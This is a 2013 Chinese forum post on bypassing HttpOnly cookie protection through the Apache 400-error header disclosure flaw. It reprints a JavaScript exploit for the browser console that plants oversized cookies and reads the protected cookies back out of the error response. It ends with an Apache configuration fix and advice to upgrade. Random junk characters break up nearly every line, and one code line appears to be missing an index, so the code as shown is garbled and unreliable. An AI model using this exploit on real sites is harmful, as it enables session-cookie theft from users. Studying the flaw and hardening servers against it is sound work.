很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
9 T4 y `) o% t! w9 t8 P/ z) ~
: K# O: g$ @6 t: X Y用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车: ^2 K9 @4 H$ }7 t
, V" d3 U% j) }) ~0 m; v1 Q# E9 k1 a( w. y
// http://www.exploit-db.com/exploits/18442/9 d! y9 c( t3 ?( y0 I& D, L
function setCookies (good) {
. o, }. U5 [1 A X- B4 \( D// Construct string for cookie value& D7 J5 m% E% o* Q5 E9 S& p7 B6 }
var str = "";6 q( V2 u% p; k6 E$ E( J
for (var i=0; i< 819; i++) {$ r K& v% k& U' E2 W" C
str += "x";
5 E) p& x: `! m3 V* n* G2 S}
# z# E8 D4 e9 y# j// Set cookies
# x6 _0 I& N! ^+ C( Q% kfor (i = 0; i < 10; i++) {
3 t- M3 L% \0 J# u3 u) d// Expire evil cookie
# ]* i8 Y) C+ P* `, f7 uif (good) {
& Q' S* _2 S8 L1 d! }var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
/ {) x6 v/ y/ h: f9 t F}
+ Y! d1 K" [9 O7 g j# J// Set evil cookie' \( ~' Y- I5 u- \
else {
% Q; C- G' d* k+ b/ x1 }; x' P5 {. Nvar cookie = "xss"+i+"="+str+";path=/";
5 C! N& m6 n# A$ N1 y1 X5 {}
, k# z1 E9 r! rdocument.cookie = cookie;
6 I- b6 M3 v* {7 Q) }8 Z}. U& |1 M7 M2 Y' X; w
}0 ?. @" t! W8 c1 c
function makeRequest() {
/ v$ [1 l6 ? {setCookies();6 e/ x7 n5 n1 K5 S3 W" A
function parseCookies () {
: `' r. J9 X, c7 H; {4 H( M5 A" J5 @var cookie_dict = {};, L* ?" R1 Q8 V
// Only react on 400 status
. B; S3 c) p% k, e0 d7 {if (xhr.readyState === 4 && xhr.status === 400) {
) Y" T" \7 z+ f4 k" E- [2 f- A% T2 p// Replace newlines and match <pre> content$ U# P. i8 w( U0 G2 W, P
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);; T0 Z1 k/ T& K7 J! C: I' v/ c+ ]2 G
if (content.length) {
+ v9 A* g9 M% q! K( N// Remove Cookie: prefix
9 U, m6 J: G; f6 _+ F, u+ r3 _8 jcontent = content[1].replace("Cookie: ", "");
8 w( I/ v+ y% evar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
# q; ~7 I( ^8 i9 D' \// Add cookies to object
5 E, t+ x/ r2 t* |for (var i=0; i<cookies.length; i++) {
' W# D1 r' i! c- J: _var s_c = cookies.split('=',2);3 A4 C! k. E" b" `# q
cookie_dict[s_c[0]] = s_c[1];, [) c4 o) j0 A0 n$ u
}. |5 N) O; ^6 @5 u% |2 M
}
- u9 \% @6 j) q% u) Y// Unset malicious cookies8 F( X c" p) i) q+ H2 z
setCookies(true);
2 x+ t7 e! n7 K2 aalert(JSON.stringify(cookie_dict));
2 d7 j$ V6 e l; C. B}' Y q6 O9 Z! y* V" i/ j/ y
}
$ h: I, q9 Y+ F& G; M& |// Make XHR request5 }6 D5 D3 }8 O
var xhr = new XMLHttpRequest();
8 P1 v9 H( I) X: a9 O4 Q! L8 kxhr.onreadystatechange = parseCookies;6 O6 Y J- R0 o0 q; r$ s; }
xhr.open("GET", "/", true);
5 `) w! n6 m) d2 r5 K" txhr.send(null);
_7 ^/ D4 Z4 V5 B( `( J+ M}" F: h+ D1 h% g
makeRequest();( X* U- ~- l$ Q7 d/ G* f, ]5 _
% r8 s; |9 ^8 n6 D1 E! l2 N你就能看见华丽丽的400错误包含着cookie信息。
) \* w4 ~& h) R' l: Z( H% `
5 M4 k& M7 L- Y# b# p5 w下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#8 a8 E- G/ `# n( k' p C
* J! t/ L7 B" C$ d; o
修复方案:
) t0 G( Y7 x: j+ l; m
" H. W1 ^3 ?) m V; A/ w# R. eApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下8 L( F; X" j' p7 \; m- H
# R5 v# T# q& X) r+ NIn the event of a problem or error, Apachecan be configured to do one of four things,5 w$ N7 r8 q, {1 l
2 S( O% r) y6 Q" ]1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
4 v* j5 P6 _8 _! G2. output acustomized message输出一段信息
1 N5 }$ ~" h8 K% ^, x9 Y( a3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
: x6 V5 y! t; z2 z( C( F+ i) e4. redirect to an external URL to handle theproblem/error转向一个外部URL
p! v: y' T' ?% k9 t- |2 a% Z- G/ ] h, E, I5 T
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容( ~% a- `( m# n; g5 \
! B# @: q* C _% O) J
Apache配置:
' y3 s8 V) e$ A6 @, o. Z
2 q/ W- l) e' P. Z& \) sErrorDocument400 " security test"
7 g1 q5 ^" v! _, {; T, w
* Z/ m9 e. r9 M' W S当然,升级apache到最新也可:)。* W3 ?1 E' ^1 m
$ o( B' d1 R/ z9 o参考:http://httpd.apache.org/security/vulnerabilities_22.html3 @( v ?6 d$ o7 ?
' B# A4 O" z+ j( T
|
发表于 2013-4-19 19:15:43
收藏
支持
反对